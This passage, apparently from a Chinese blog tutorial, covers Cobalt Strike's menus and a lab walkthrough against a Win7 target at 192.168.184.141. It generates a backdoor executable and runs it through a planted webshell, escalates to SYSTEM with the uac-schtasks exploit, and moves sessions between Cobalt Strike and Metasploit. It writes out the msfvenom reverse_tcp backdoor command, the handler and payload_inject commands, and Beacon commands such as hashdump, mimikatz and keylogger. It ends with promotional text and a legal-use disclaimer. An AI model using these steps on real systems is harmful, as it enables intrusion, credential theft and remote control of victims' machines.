2024年网络安全最全Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4

Keystrokes #查看键盘记录结果
Proxy Pivots #查看代理模块
Screenshots #查看所有屏幕截图
Script Console #加载第三方脚本以增强功能
Targets #显示所有受害主机
Web Log #所有Web服务的日志


**3、Attacks**  
 **Packages:**



HTML Application #生成(executable/VBA/powershell)这三种原理实现的恶意木马文件
MS Office Macro #生成office宏病毒文件
Payload Generator #生成各种语言版本的payload
Windows Executable #生成可执行exe木马
Windows Executable(S) #生成无状态的可执行exe木马


**Web Drive-by:**



Manage #对开启的web服务进行管理
Clone Site #克隆网站,可以记录受害者提交的数据
Host File #提供文件下载,可以选择Mime类型
Scripted Web Delivery #为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery
Signed Applet Attack #使用java自签名的程序进行钓鱼攻击(该方法已过时)
Smart Applet Attack #动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时)
System Profiler #用来获取系统信息,如系统版本,Flash版本,浏览器版本等


**Spear Phish** #鱼叉钓鱼邮件


**4、Reporting**



Activity Report #活动报告
Hosts Report #主机报告
Indicators of Compromise #IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
Sessions Report #会话报告
Social Engineering Report #社会工程报告:包括鱼叉钓鱼邮件及点击记录
Tactics, Techniques, and Procedures #战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
Reset Data #重置数据
Export Data #导出数据,导出.tsv文件格式


**5、Help**



Homepage #官方主页
Support #技术支持
Arsenal #开发者
System information #版本信息
About #关于


**工具栏说明**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021041213283838.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


## 四、使用教程


使用大致流程  
 创建团队服务器->客户端连接服务器->创建监听器->生成后门对应监听器->靶机运行后门成功上线->后渗透(提权,内网漫游,域渗透等)


### 4.1 Cobalt Strike ——Webshell上线CS自动提权


**1、创建监听器**  
 如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412133526142.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 之后点击添加  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412133553510.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412133850833.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 出现下图弹窗则说明监听器设置成功,并且正在监听  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412133903839.png)  
 **2、生成木马**  
 按下图所示生成Windows Executable后门木马  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412134251445.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 选择已生成好的监听器  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412134438131.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 勾选X64:目标系统是64位的话需要勾选  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412134500941.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 将生成的木马保存在电脑中  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412134533811.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 保存成功后会有如下提示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021041213455115.png)  
 **3、执行木马、反弹会话**


\*\*前提条件:\*\*假设已成功植入webshell,并且通过webshell上传了后门木马artifact.exe  
 **靶机:** win7 IP:192.168.184.141  
 使用蚁剑连接webshell  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412141515415.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412141554121.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 执行artifact.exe后门文件,目标靶机成功上线  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412141713287.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 点击查看视图的图标,可以看到上线主机的信息为普通用户:zhxxxx  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412142036576.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 **4、提权**  
 CS里面含有自动化的提权  
 右键选择第一个,进入命令行模式(具体命令可以查看文章最下面的指令大全)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412142307829.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412142403575.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 测试执行命令:getuid,稍等一会儿后会显示执行结果  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412143220746.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 接下来右键选择提权,如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412143333794.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 默认提权的exp就下面这两个,肯定不够,所以得去加载一些提权的插件


**常用的插件地址:**  
 https://github.com/DeEpinGh0st/Erebus  
 https://github.com/rsmudge/ElevateKit  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412143358960.png)  
 下载其中一个提权插件并保存,本示例下载的是:https://github.com/rsmudge/ElevateKit  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021041214392877.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


**如何加载插件?**  
 如下图所示,选择脚本管理器后,会在下面弹窗提示path  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412143618957.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 之后选择 插件 并点击打开  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412144018402.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 之后点击 Unload 上传插件  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412144149852.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 之后再查看提权的EXP,发现增加了很多  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202104121442428.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 接下来利用 uac-schtasks 的 exp进行提权  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412150118389.png)


点击开始之后,可以通过命令看出正在进行攻击测试了,攻击成功的话会上线一个权限为:SYSTEM 的系统,如下图所示,即是成功提权  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412150225966.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


### 4.2 Cobalt Strike ——CS与MSF相互联动传递(Empire)



#CS->MSF
cs: spawn XXx
windows/foreign/reverse_http
MSF:
windows/meterpreter/reverse_http

#MSF->CS
MSF:
use exploit/windows/local/payload_inject
windows/meterpreter/reverse_http
CS:
windows/beacon_http/reverse_http


**CS->MSF示例**  
 **前提:** CS控制了靶机


首先启动kali的msf



msfconsole


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412150936870.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 然后设置一下payload与选项,让kali打开监听,如下图所示,正在监听是由有会话



use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.184.145 //kali的地址
set lport 1234
exploit


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412151349249.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 接下来需要去CS中新建一个监听器  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412151602464.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 监听器创建成功后会如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412152241957.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 接下来选择需要转移的会话,比如是SYSTEM权限的会话  
 进入命令行模式  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021041215174743.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 执行命令:



spawn msf


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412152347346.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 稍等2分钟后,msf能接收到转移来的会话,如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021041215253283.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 **MSF->CS示例**


**前提:** MSF控制了靶机


MSF生成后门 ceshi.exe,并且将后门 ceshi.exe 放在靶机win7上



msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.145 lport=2222 -f exe -o ceshi.exe


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412153227753.png)  
 msf打开监听



use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.184.145 //kali的地址
set lport 2222
exploit


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412153608138.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 此时在靶机win7上执行一下ceshi.exe  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412153400964.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 msf成功监听到会话  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412153702829.png)  
 接下来需要转移会话了  
 打开cs,创建监听器名字为msf  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412155733218.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


创建成功后如下图所示  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412155744566.png)


接下来将MSF的会话转移到CS



background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.184.145
set lport 6666
set session 1
exploit


数万命令如下图显示,则说明成功转移会话  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412160140431.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412160151710.png)  
 接下来查看cs客户端,发现新上线了一台msf监听器监听道德会话  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210412160217490.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


## 指令大全:



BeaconCommands

Command                   Description
-------                   -----------
browserpivot              注入受害者浏览器进程
bypassuac                 绕过UAC
cancel                    取消正在进行的下载
cd                        切换目录
checkin                   强制让被控端回连一次
clear                     清除beacon内部的任务队列
connect                   Connect to a Beacon peerover TCP
covertvpn                 部署Covert VPN客户端
cp                        复制文件
dcsync                    从DC中提取密码哈希
desktop                   远程VNC
dllinject                 反射DLL注入进程
dllload                   使用LoadLibrary将DLL加载到进程中
download                  下载文件
downloads                 列出正在进行的文件下载
drives                    列出目标盘符
elevate                   尝试提权

execute 在目标上执行程序(无输出)
execute-assembly 在目标上内存中执行本地.NET程序
exit 退出beacon
getprivs Enable system privileges oncurrent token
getsystem 尝试获取SYSTEM权限
getuid 获取用户ID
hashdump 转储密码哈希值
help 帮助
inject 在特定进程中生成会话
jobkill 杀死一个后台任务
jobs 列出后台任务
kerberos_ccache_use 从ccache文件中导入票据应用于此会话
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入票据应用于此会话
keylogger 键盘记录
kill 结束进程
link Connect to a Beacon peerover a named pipe
logonpasswords 使用mimikatz转储凭据和哈希值
ls 列出文件
make_token 创建令牌以传递凭据
mimikatz 运行mimikatz
mkdir 创建一个目录
mode dns 使用DNS A作为通信通道(仅限DNS beacon)
mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon)
mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon)
mode http 使用HTTP作为通信通道
mv 移动文件

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 22
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
注意:Cobalt Strike是一款安全测试工具,仅用于合法的安全测试和研究目的,不得用于非法用途。 Cobalt Strike是一款功能强大的渗透测试工具,可以模拟攻击行为,评估网络安全防御能力。本文将介绍Cobalt Strike安装教程。 1. 下载Cobalt Strike Cobalt Strike是一款商业软件,需要购买正版授权才能使用。您可以在Cobalt Strike官方网站(https://www.cobaltstrike.com/)购买正版授权并下载软件。 2. 安装Java Cobalt Strike需要Java环境支持,因此需要先安装Java环境。您可以在Oracle官网(https://www.oracle.com/java/technologies/javase-jdk16-downloads.html)下载并安装Java。 3. 解压Cobalt Strike 将下载好的Cobalt Strike压缩包解压到指定目录中,例如解压到/opt/cobaltstrike目录中。 4. 启动Cobalt Strike 进入Cobalt Strike安装目录,执行以下命令启动Cobalt Strike: ``` cd /opt/cobaltstrike ./teamserver IP地址 密码 ``` 其中,IP地址是Cobalt Strike服务器的IP地址,密码是Cobalt Strike服务器的密码。执行该命令后,Cobalt Strike会在后台运行,并监听指定的IP地址和端口。 5. 连接Cobalt Strike 在启动Cobalt Strike后,可以使用Cobalt Strike客户端连接到Cobalt Strike服务器。打开Cobalt Strike客户端,输入Cobalt Strike服务器的IP地址和端口,然后输入密码,即可连接到Cobalt Strike服务器。 6. 使用Cobalt Strike 连接成功后,可以使用Cobalt Strike进行渗透测试。Cobalt Strike提供了多种攻击模块和攻击技术,可以根据需要选择相应的模块和技术进行测试。 总结 Cobalt Strike是一款功能强大的渗透测试工具,需要购买正版授权才能使用。安装过程比较简单,需要先安装Java环境,然后解压Cobalt Strike压缩包,最后启动Cobalt Strike并连接到Cobalt Strike服务器即可。在使用Cobalt Strike进行渗透测试时,需要注意遵守法律法规,不得用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值